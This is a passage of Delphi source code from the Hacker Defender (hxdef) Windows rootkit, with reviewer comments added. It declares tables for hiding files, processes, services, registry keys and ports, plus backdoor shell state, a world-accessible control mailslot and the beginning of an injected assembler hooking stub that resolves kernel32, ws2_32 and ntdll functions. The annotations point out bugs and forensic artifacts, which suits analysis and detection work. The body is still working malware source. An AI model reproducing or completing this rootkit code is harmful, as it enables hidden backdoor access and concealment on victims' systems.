// Prototypes for ntdll.dll routines that hxdef resolves by name at run time (the matching
// procedure variables NtQueryObject, RtlInitUnicodeString, ... live in the var section below).
// All are stdcall with a Cardinal result; for the Nt* and Rtl*StringTo* routines that result
// is the raw NTSTATUS, so a caller must compare it against STATUS_SUCCESS rather than treat
// it as a Boolean.
TNtQueryObject=function(AObjectHandle:THandle;AObjectInformationClass:Cardinal;AObjectInformation:Pointer;AObjectInformationLength:Cardinal;AReturnLength:PCardinal):Cardinal; stdcall;
TNtQueryVolumeInformationFile=function(AFileHandle:THandle;AIoStatusBlock:Pointer;AVolumeInformation:Pointer;AVolumeInformationLength:Cardinal;AVolumeInformationClass:Cardinal):Cardinal; stdcall;
// AAllocateDestinationString=True asks ntdll to allocate the destination buffer, which then
// has to be released with the matching RtlFree*String routine declared just below.
TRtlAnsiStringToUnicodeString=function(ADestinationString:PUnicodeString;ASourceString:PAnsiString;AAllocateDestinationString:Boolean):Cardinal; stdcall;
TRtlUnicodeStringToAnsiString=function(ADestinationString:PAnsiString;ASourceString:PUnicodeString;AAllocateDestinationString:Boolean):Cardinal; stdcall;
// NOTE(review): the native API defines RtlFreeAnsiString, RtlFreeUnicodeString and
// RtlInitUnicodeString as returning VOID; the Cardinal declared here is simply whatever is
// left in EAX and must not be checked.
TRtlFreeAnsiString=function(AAnsiString:PAnsiString):Cardinal; stdcall;
TRtlFreeUnicodeString=function(AUnicodeString:PUnicodeString):Cardinal; stdcall;
TRtlInitUnicodeString=function(ADestinationString:PUnicodeString;ASourceString:PWideChar):Cardinal; stdcall;
const
// Byte size of the shared control structure (TIntercomBuffer is declared earlier in the file).
INTERCOM_BUFFER_SIZE=SizeOf(TIntercomBuffer);
// Size of a DACL holding one ACCESS_ALLOWED_ACE *before* the SID is appended; the SizeOf(DWORD)
// removes the SidStart placeholder inside ACCESS_ALLOWED_ACE. CreateEveryoneSecAttr below
// recomputes the same quantity inline and adds GetLengthSid instead of using this constant.
ACL_SIZE=SizeOf(ACL)+SizeOf(ACCESS_ALLOWED_ACE)-SizeOf(DWORD);
// Winsock's INVALID_SOCKET (all bits set), redefined locally.
INVALID_SOCKET=TSocket(not(0));
var
// Configuration tables, each a 64 KiB Char buffer with a matching *ArraySize counter below.
// From their names they hold the hidden-file, "root" process, hidden service and hidden
// registry key/value lists; the parser that fills them is outside this view, so confirm the
// exact record layout there before relying on it.
HiddenArray,RootArray,ServicesArray,RegKeysArray,RegValuesArray:array[0..65535] of Char;
// 26 slots of 40 Chars — presumably one free-space entry per drive letter (confirm in the parser).
FreeSpaceArray:array[0..26*40-1] of Char;
// Two 64 Ki-entry tables — presumably one flag per port for each of two protocols (confirm).
HiddenPortsArray:array[0..2*65536-1] of Char;
// NOTE(review): only 4 Chars, yet PasswordArraySize is tracked separately; check the ini
// parser for how longer passwords are handled before assuming a 4-byte limit.
PasswordArray:array[0..3] of Char;
BytesRead,BytesWritten,HiddenArraySize,RootArraySize,ServicesArraySize,RegKeysArraySize,
RegValuesArraySize,PasswordArraySize,FreeSpaceArraySize,HiddenPortsArraySize,MessageSize,TID:Cardinal;
// Server side of the control channel: the mailslot and a write handle opened on it (both
// created in CreateServerMailslot below), plus a file-mapping handle that, by name, carries
// the ini data to other processes.
ServerMailslotHandle,ServerMailslotFileHandle,IniMappingHandle:THandle;
// Resolved kernel32 addresses — presumably what the DirectHook stub bootstraps its own
// import resolution from (its API-name tables are further down).
GetProcAddressAddr,GetModuleHandleAAddr,IniMappingAddr:Pointer;
PB:PByte;
InfectedProcessCount,MsgSender,RealHookedCount,SomeCreateProcess:Integer;
Done,IsService,MainLoopRunning:Boolean;
FIni:TextFile;
MailslotName,IniFile:string;
IntercomBuffer:TIntercomBuffer;
// Delphi links constants at a fixed image address, but the DirectHook stub has to run at
// whatever address it is copied to. DirectHook therefore obtains its own run-time address
// (call/pop in @GetBaseAddr) and subtracts this value, which is patched into the
// `sub eax,imm32` immediate at @GetBaseAddr_BasicOffset, to turn static addresses into
// position-independent ones.
BasicOffset:Cardinal; //this is static delphi address for its consts
//but we need dynamical, NO static
//so we will subtract this magic number every time we need
//e.g. =$00404EAB
// Service dispatch table: one entry for this service plus the terminating entry
// (presumably handed to StartServiceCtrlDispatcher — confirm in the service code).
DispatchTable:array[0..1] of TServiceTableEntry;
ServiceStatusHandle:SERVICE_STATUS_HANDLE;
ServiceStatus:TServiceStatus;
StartupFlags:TStartupFlags;
// State of the backdoor shell session: its mailslot pair, the redirected console handles,
// saved console geometry/contents and the spawned shell's process id. The code that uses
// these is outside this view.
BackdoorVars:record
BSHRun:Boolean;
BackdoorMailslotName,SrvMailslotName:string;
SrvMailslotHandle,BackdoorMailslotHandle,InputHandle,OutputHandle:THandle;
FirstCoords,SecondCoords:TCoord;
FirstRect:TSmallRect;
FullConsoleScreen:TConsoleScreen;
ShellProcess:Cardinal;
end;
// Presumably ini-configured names (service, driver, file mapping, mailslot). From a
// detection standpoint these are the host artifacts an installed copy leaves behind.
BackdoorShell,ServiceName,ServiceDisplayName,ServiceDescription,DriverName,DriverFileName,
FileMappingName,ServerMailslotName:string;
// ntdll entry points resolved at run time (see the T* prototypes above).
NtQuerySystemInformation:TNtQuerySystemInformation;
NtLoadDriver:TNtLoadDriver;
NtQueryObject:TNtQueryObject;
NtQueryVolumeInformationFile:TNtQueryVolumeInformationFile;
RtlAnsiStringToUnicodeString:TRtlAnsiStringToUnicodeString;
RtlUnicodeStringToAnsiString:TRtlUnicodeStringToAnsiString;
RtlFreeAnsiString:TRtlFreeAnsiString;
RtlFreeUnicodeString:TRtlFreeUnicodeString;
RtlInitUnicodeString:TRtlInitUnicodeString;
// Text substitutions (OrgStr -> NewStr); ShortcutCount is declared outside this view.
Shortcuts:array[0..ShortcutCount-1] of record
OrgStr,NewStr:string;
end;
// Command line as seen by Main: first argument and argument count.
Argv1:string;
Argc:Cardinal;
{$IFDEF LOGGING}
// Debug-only (LOGGING builds): appends `main: ` followed by a to HxdefLogFileName, ending
// the line when e is True. The file is opened and closed on every call, so concurrent
// writers can interleave within a line, and if I/O checking is on a locked or unwritable
// log raises EInOutError here. Any LOGGING build leaves this file on disk — a useful
// forensic artifact when such a build is found.
procedure Log(a:string;e:Boolean=True); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
// append to an existing log, otherwise create it
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,'main: ');
write(f,a);
if e then writeln(f);
closefile(f);
end;
// Debug-only: writes the low byte of each UTF-16 code unit of a^ to HxdefLogFileName,
// ending the line when e is True.
// NOTE(review): a^.Length (a byte count) is copied into a 256-byte stack buffer with no
// bound check, so a longer UNICODE_STRING overruns the stack; clamp it with
// `if l>SizeOf(buffer) then l:=SizeOf(buffer);` before the copymemory. a is never checked
// for nil either. Because only buffer[i*2] is emitted, any character outside Latin-1 is
// logged as garbage.
procedure LogUnicodeString(a:PUnicodeString;e:boolean); stdcall;
var
f:textfile;
i,l:integer;
buffer:array[0..255] of char;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
l:=a^.Length; // byte length of the UTF-16 buffer
copymemory(@buffer,a^.Buffer,l);
// one output char per 2-byte code unit, taking only the low byte
for i:=0 to l div 2-1 do
write(f,buffer[i*2]);
if e then writeln(f);
closefile(f);
end;
// Debug-only: appends the decimal form of a to HxdefLogFileName, ending the line when e is
// True. Same open/append/close-per-call pattern (and the same caveats) as Log above.
procedure LogInt(a:Integer;e:boolean); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,a);
if e then writeln(f);
closefile(f);
end;
// Debug-only: appends the single character a to HxdefLogFileName without a line break.
// Same open/append/close-per-call pattern (and the same caveats) as Log above.
procedure LogChar(a:char); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,a);
closefile(f);
end;
{$ENDIF}
// Forward declarations. DirectHook and DirectHookEnd bracket the position-independent
// assembler stub defined further down; the second label presumably exists so the stub's
// length can be computed before it is copied elsewhere — confirm at the call site, which
// is outside this view.
procedure Main; forward;
function DirectHook(APID,AOperation:Cardinal):Cardinal; stdcall; assembler; forward;
procedure DirectHookEnd; assembler; forward;
procedure SendMainLoopTermination(AUninstall:Boolean); forward;
// Builds a security descriptor whose DACL grants GENERIC_ALL to the well-known Everyone SID
// (S-1-1-0) and wires it into ASecAttr for use in an object-creation call. The ACL is
// VirtualAlloc'ed and handed back through APDAcl because ASecDesc only points at it: the
// caller owns that memory (and must VirtualFree it) for as long as the descriptor is in use.
//
// Security note: this is a deliberately world-accessible ACL. Every local account,
// including unprivileged ones, gets full access to whatever object is created with it
// (here the control mailslot; see CreateServerMailslot), so anything that can open that
// object can talk to the server side.
//
// Resource handling: LEveryoneSid is never released with FreeSid, and on the failure paths
// after VirtualAlloc the ACL is not freed either — although APDAcl is already set by then,
// so the caller is able to release it. Returns False as soon as any Win32 call fails.
function CreateEveryoneSecAttr(var ASecAttr:TSecurityAttributes;var ASecDesc:TSecurityDescriptor;var APDAcl:PAcl):Boolean;
var
LDAcl:PAcl;
LEveryoneSid:PSID;
LAclSize:Cardinal;
begin
Result:=False;
// S-1-1-0: World SID authority with the single sub-authority SECURITY_WORLD_RID
if not AllocateAndInitializeSid(SECURITY_WORLD_SID_AUTHORITY,1,SECURITY_WORLD_RID,0,0,0,0,0,0,0,LEveryoneSid) then Exit;
// header + one ACE + the SID, minus the SidStart placeholder already inside the ACE
LAclSize:=SizeOf(ACL)+SizeOf(ACCESS_ALLOWED_ACE)+GetLengthSid(LEveryoneSid)-SizeOf(DWORD);
LDAcl:=VirtualAlloc(nil,LAclSize,MEM_COMMIT,PAGE_READWRITE);
if LDAcl=nil then Exit
else APDAcl:=LDAcl; // ownership of the ACL memory passes to the caller from here on
if not InitializeAcl(LDAcl^,LAclSize,ACL_REVISION) then Exit;
if not AddAccessAllowedAce(LDAcl^,ACL_REVISION,GENERIC_ALL,LEveryoneSid) then Exit;
if not InitializeSecurityDescriptor(@ASecDesc,SECURITY_DESCRIPTOR_REVISION) then Exit;
// bDaclPresent=True, bDaclDefaulted=False: install the explicit Everyone ACL
if not SetSecurityDescriptorDacl(@ASecDesc,True,LDAcl,False) then Exit;
with ASecAttr do
begin
lpSecurityDescriptor:=@ASecDesc;
nLength:=SizeOf(ASecAttr);
bInheritHandle:=False; // handles created with this are not inherited by child processes
end;
Result:=True;
end;
// Creates the server-side control mailslot AMailslotName using the Everyone/GENERIC_ALL
// descriptor from CreateEveryoneSecAttr, then opens a second, write-only handle on the same
// name. Both handles go into the globals ServerMailslotHandle / ServerMailslotFileHandle;
// the ACL memory comes back through APDAcl and is the caller's to free.
// CreateMailslot arguments: 0 = no maximum message size, INFINITE = reads block until a
// message arrives.
//
// Caveats: both calls are made unconditionally, so when CreateMailslot fails the CreateFile
// can still succeed against a mailslot some other process owns (CheckUniqInstance below
// uses exactly that probe). If only one of the two succeeds the function returns False but
// does not close the handle that was opened. Because the descriptor makes the slot
// writable by any local user, nothing received on it can be treated as trusted.
function CreateServerMailslot(AMailslotName:string;var APDAcl:PAcl):Boolean;
var
LSecAttr:TSecurityAttributes;
LSecDesc:TSecurityDescriptor;
begin
Result:=False;
if not CreateEveryoneSecAttr(LSecAttr,LSecDesc,APDAcl) then Exit;
// LSecAttr/LSecDesc are locals and die with this frame; only the ACL (APDAcl) outlives it
ServerMailslotHandle:=CreateMailslot(PChar(AMailslotName),0,INFINITE,@LSecAttr);
ServerMailslotFileHandle:=CreateFile(PChar(AMailslotName),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,
nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Result:=not ((ServerMailslotHandle=INVALID_HANDLE_VALUE) or (ServerMailslotFileHandle=INVALID_HANDLE_VALUE));
end;
// Single-instance check: tries to open ServerMailslotName for writing. Success means a
// mailslot of that name already exists — taken to mean another copy is running — and the
// process Halts unless it was started with sfInstallOnly. The probe handle is closed either
// way. Two copies starting at the same time can both pass (there is no atomic claim), and
// any process that has created a mailslot of that name which this one can open will make
// it exit, since the probe cannot tell who owns the slot.
procedure CheckUniqInstance;
var
LFile:THandle;
begin
LFile:=CreateFile(PChar(ServerMailslotName),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if LFile<>INVALID_HANDLE_VALUE then
begin
CloseHandle(LFile);
// an install-only run is allowed to coexist with a running instance
if StartupFlags<>sfInstallOnly then Halt;
end;
end;
function DirectHook(APID,AOperation:Cardinal):Cardinal; stdcall; assembler;
asm
pop ebp //delphi call
jmp @DirectHook_begin
@Body:
@GetAddr:
call @GetBaseAddr
@GetBaseAddr:
pop eax
db 02Dh //sub eax
@GetBaseAddr_BasicOffset:
db 000h,000h,000h,000h //BasicOffset
ret
@FileMappingName : db 041h,041h,041h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h
@cMainProcessPID : db 000h,000h,000h,000h
@DLLNames :
@Kernel32_DLL :
@Kernel32DLLName : db 'kernel32.dll' ,000h
@Kernel_API :
@SetLastErrorName : db 'SetLastError' ,000h
@CreateMailslotAName : db 'CreateMailslotA' ,000h
@GetMailslotInfoName : db 'GetMailslotInfo' ,000h
@WriteFileName : db 'WriteFile' ,000h
@ReadFileName : db 'ReadFile' ,000h
@CloseHandleName : db 'CloseHandle' ,000h
@GetEnvironmentVariableWName : db 'GetEnvironmentVariableW' ,000h
@GetModuleFileNameAName : db 'GetModuleFileNameA' ,000h
@DuplicateHandleName : db 'DuplicateHandle' ,000h
@CreateProcessAName : db 'CreateProcessA' ,000h
@ExitThreadName : db 'ExitThread' ,000h
@CreateThreadName : db 'CreateThread' ,000h
@CreatePipeName : db 'CreatePipe' ,000h
@PeekNamedPipeName : db 'PeekNamedPipe' ,000h
@WaitForMultipleObjectsName : db 'WaitForMultipleObjects' ,000h
@TerminateThreadName : db 'TerminateThread' ,000h
@TerminateProcessName : db 'TerminateProcess' ,000h
@DisconnectNamedPipeName : db 'DisconnectNamedPipe' ,000h
@IsBadReadPtrName : db 'IsBadReadPtr' ,000h
@OpenProcessName : db 'OpenProcess' ,000h
@LocalAllocName : db 'LocalAlloc' ,000h
@LocalFreeName : db 'LocalFree' ,000h
@GetLastErrorName : db 'GetLastError' ,000h
@Advapi32_DLL :
@Advapi32DLLName : db 'advapi32.dll' ,000h
@Advapi_API :
@EnumServiceGroupWName : db 'EnumServiceGroupW' ,000h
@EnumServicesStatusAName : db 'EnumServicesStatusA' ,000h
@EnumServicesStatusExWName : db 'EnumServicesStatusExW' ,000h
@EnumServicesStatusExAName : db 'EnumServicesStatusExA' ,000h
{new 078}
@AllocateAndInitializeSidName : db 'AllocateAndInitializeSid' ,000h
@GetLengthSidName : db 'GetLengthSid' ,000h
@InitializeAclName : db 'InitializeAcl' ,000h
@AddAccessAllowedAceName : db 'AddAccessAllowedAce' ,000h
@InitializeSecurityDescriptorName : db 'InitializeSecurityDescriptor' ,000h
@SetSecurityDescriptorDaclName : db 'SetSecurityDescriptorDacl' ,000h
{/new 078}
@WS2_32_DLL :
@WS2_32DLLName : db 'ws2_32.dll' ,000h
@WS2_32_API :
@sendName : db 'send' ,000h
@recvName : db 'recv' ,000h
@WSARecvName : db 'WSARecv' ,000h
@WSAGetLastErrorName : db 'WSAGetLastError' ,000h
@WSAEventSelectName : db 'WSAEventSelect' ,000h
@WSAIoctlName : db 'WSAIoctl' ,000h
@WSASocketAName : db 'WSASocketA' ,000h
@WSAConnectName : db 'WSAConnect' ,000h
@WSACreateEventName : db 'WSACreateEvent' ,000h
@WSAWaitForMultipleEventsName : db 'WSAWaitForMultipleEvents' ,000h
@WSAEnumNetworkEventsName : db 'WSAEnumNetworkEvents' ,000h
@closesocketName : db 'closesocket' ,000h
@User32_DLL :
@User32DLLName : db 'user32.dll' ,000h
@User32_API :
@PeekMessageAName : db 'PeekMessageA' ,000h
@NTDLL_DLL :
@NTDLLDLLName : db 'ntdll.dll' ,000h
@NTDLL_API :
@NtQuerySystemInformationName : db 'NtQuerySystemInformation' ,000h
@NtQueryDirectoryFileName : db 'NtQueryDirectoryFile' ,000h
@NtVdmControlName : db 'NtVdmControl' ,000h
@NtQueryObjectName : db 'NtQueryObject' ,000h
@NtQueryInformationThreadName : db 'NtQueryInformationThread' ,000h
@NtResumeThreadName : db 'NtResumeThread' ,000h
@NtSuspendThreadName : db 'NtSuspendThread' ,000h